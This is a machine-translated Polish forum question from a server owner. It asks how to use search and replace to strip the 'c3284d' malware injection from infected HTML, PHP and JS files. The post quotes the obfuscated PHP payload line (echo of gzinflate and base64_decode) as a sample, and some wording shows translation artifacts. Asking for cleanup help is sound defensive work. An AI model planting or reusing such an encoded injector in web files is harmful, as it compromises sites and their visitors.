Wyczyść serwer zainfekowany wirusem c3284d, używając wyszukiwania i zamiany

Mam problem z wirusem Notorious c3284d. Zmienia prawie wszystkie pliki html / php / js, które może znaleźć.

Zmieniłem wszystkie hasła i użytkowników na serwerze, więc jeśli jest to zainfekowane konto, powinno to rozwiązać ten problem, ale wciąż staram się go całkowicie usunąć.

Udało mi się znaleźć wszystkie zainfekowane pliki za pomocą prostegosudo grep -R "#c3284d#" /home dowództwo.

Ale potrzebuję szybkiego sposobu wyszukiwania izastąpić to.

Podpis wirusa to ta linia:

"# C3284d #" echo (gzinflate (base64_decode ( "VVHBboMwDL1X6j / kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS + nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns / 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B / ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + / EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D / HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK + Pqabw =="))); „# / c3284d #”

Gdy linia echa może się zmieniać i zmieniać, ale zawsze zaczyna się od#c32..# i skończ z#/c3....#.

Chcę tylko zastąpić go niczym.

questionAnswers(2)

yourAnswerToTheQuestion